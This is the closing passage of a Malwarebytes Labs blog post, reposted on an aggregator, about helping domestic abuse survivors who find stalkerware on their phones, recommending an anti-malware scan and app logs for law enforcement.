Malwarebytes has also written a few articles on types of technology, malicious or not, that are often abused to their victims’ detriment. Awareness of what’s out there and how it can be used against you can help you stay safe:

And if you are able to install an anti-malware program on your mobile device, running a scan with Malwarebytes for Android can help you detect and remove stalkerware apps—as well as keep a log of which apps were installed on your phone, which is valuable information if you choose to work with law enforcement.

We’re here for you. We care. And we’ll always do what we can to help users have a safe online—and offline—experience with technology.

Stay tuned for our next article in our stalkerware series, which will explore which monitoring apps are safe for parents to use, and which should be avoided. Stay safe.

The post Helping survivors of domestic abuse: What to do when you find stalkerware appeared first on Malwarebytes Labs.

Categories: Techie Feeds


Subscribe to Furiously Eclectic People aggregator - Techie Feeds